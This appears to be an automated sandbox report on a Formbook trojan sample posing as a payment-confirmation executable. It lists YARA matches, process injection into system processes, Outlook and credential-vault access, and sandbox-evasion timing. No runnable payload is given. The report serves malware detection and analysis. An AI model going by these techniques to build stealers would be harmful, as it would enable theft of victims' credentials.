Source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/7@20/12
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0132D712 GetLastError,FormatMessageW, | 0_2_0132D712
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0131B8B0 AdjustTokenPrivileges,CloseHandle, | 0_2_0131B8B0
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0131BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, | 0_2_0131BEC3
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0132EB4B SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, | 0_2_0132EB4B
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_01326F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle, | 0_2_01326F5B
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0133C604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket, | 0_2_0133C604
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_012E31F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, | 0_2_012E31F2
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | File created: C:\Users\user\AppData\Local\Temp\aut7C51.tmp
Source: Payment confirmation 20240911.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr | Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Payment confirmation 20240911.exe | ReversingLabs: Detection: 31%
Source: Payment confirmation 20240911.exe | Virustotal: Detection: 33%
Source: unknown | Process created: C:\Users\user\Desktop\Payment confirmation 20240911.exe "C:\Users\user\Desktop\Payment confirmation 20240911.exe"
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment confirmation 20240911.exe"
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Section loaded: wow64win.dll
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Section loaded: wow64cpu.dll
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wow64cpu.dll
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Section loaded: winnsi.dll
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: mozglue.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: webio.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: wdscore.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: riched32.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | File opened: C:\Windows\SysWOW64\RichEd32.dll
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Payment confirmation 20240911.exe | Static file information: File size 1211392 > 1048576
Source: Payment confirmation 20240911.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Payment confirmation 20240911.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Payment confirmation 20240911.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Payment confirmation 20240911.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Payment confirmation 20240911.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Payment confirmation 20240911.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xONxwdydvq.exe, 00000003.00000002.745699004.0000000000F7E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000002.00000003.379153081.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.379175938.0000000000380000.00000004.00000020.00020000.00000000.sdmp, xONxwdydvq.exe, 00000003.00000003.372791774.0000000000757000.00000004.00000001.00020000.00000000.sdmp, xONxwdydvq.exe, 00000003.00000003.372875167.00000000003E0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Payment confirmation 20240911.exe, 00000000.00000003.350250762.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Payment confirmation 20240911.exe, 00000000.00000003.349937356.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.386096763.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.368106439.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.368458108.0000000000720000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.386096763.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.387256900.0000000001C80000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745591734.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.387592222.0000000001DE0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745591734.0000000001F70000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: xONxwdydvq.exe, 00000003.00000002.746297118.000000000485C000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745454539.000000000061C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745738795.000000000281C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.453233728.000000000106C000.00000004.80000000.00040000.00000000.sdmp
Source: Payment confirmation 20240911.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Payment confirmation 20240911.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Payment confirmation 20240911.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Payment confirmation 20240911.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Payment confirmation 20240911.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_013420F6 LoadLibraryA,GetProcAddress, | 0_2_013420F6
Source: sqlite3.dll.4.dr | Static PE information: section name: /4
Source: sqlite3.dll.4.dr | Static PE information: section name: /19
Source: sqlite3.dll.4.dr | Static PE information: section name: /31
Source: sqlite3.dll.4.dr | Static PE information: section name: /45
Source: sqlite3.dll.4.dr | Static PE information: section name: /57
Source: sqlite3.dll.4.dr | Static PE information: section name: /70
Source: sqlite3.dll.4.dr | Static PE information: section name: /81
Source: sqlite3.dll.4.dr | Static PE information: section name: /92
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_01307795 push ecx; ret | 0_2_013077A8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004019A7 push es; retf | 2_2_00401A2B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00406005 push ds; ret | 2_2_00406010
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00408818 push edi; ret | 2_2_004088A4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401A29 push es; retf | 2_2_00401A2B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414CD3 push edi; iretd | 2_2_00414CE1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004144AE push ebx; iretd | 2_2_004144AF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401566 push esi; iretd | 2_2_004015F7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401522 push esi; iretd | 2_2_004015F7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004145E3 push edx; ret | 2_2_00414605
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040159A push esi; iretd | 2_2_004015F7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00406FD7 push cs; ret | 2_2_00406FD8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00407784 push esi; iretd | 2_2_0040779A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EF85 pushad ; ret | 2_2_0041EF4B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040AF8E push ebp; retf | 2_2_0040AFA2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004037A0 push eax; ret | 2_2_004037A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008CDFA1 push ecx; ret | 2_2_008CDFB4
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_0040DAC5 push edi; iretd | 3_2_0040DAD9
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_0040D2A6 push ebx; iretd | 3_2_0040D2A7
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_0040EC79 pushfd ; ret | 3_2_0040ECD4
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_00403570 push cs; ret | 3_2_00403574
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_00417D7D pushad ; ret | 3_2_00417D43
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_003FEDFD push ds; ret | 3_2_003FEE08
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_00403D86 push ebp; retf | 3_2_00403D9A
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_003FFDCF push cs; ret | 3_2_003FFDD0
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_0040170A push ebx; retf | 3_2_0040170B
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | File created: C:\Users\user\AppData\Local\Temp\sqlite3.dll
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_012FF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 0_2_012FF78E
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_01347F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, | 0_2_01347F0E
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_01301E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_01301E5A
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; API/Special instruction interceptor: Address: 263234
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_00910101 rdtsc
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Window / User API: threadDelayed 656
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Window / User API: threadDelayed 9313
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dll
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Evaded block: after key decision (graph_0-108491)
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Evaded block: after key decision (graph_0-109299)
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-108984)
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; API coverage: 4.5 %
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; API coverage: 2.0 %
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe TID: 3332; Thread sleep time: -55000s >= -30000s
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe TID: 3332; Thread sleep time: -36000s >= -30000s
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3308; Thread sleep count: 656 > 30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3308; Thread sleep time: -1312000s >= -30000s
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3360; Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3308; Thread sleep count: 9313 > 30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3308; Thread sleep time: -18626000s >= -30000s
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Last function: Thread delayed (2 occurrences)
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_012FDD92 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0133219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_01332044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_013324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_01326B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_01326E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0132F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0132FD47 FindFirstFileW,FindClose
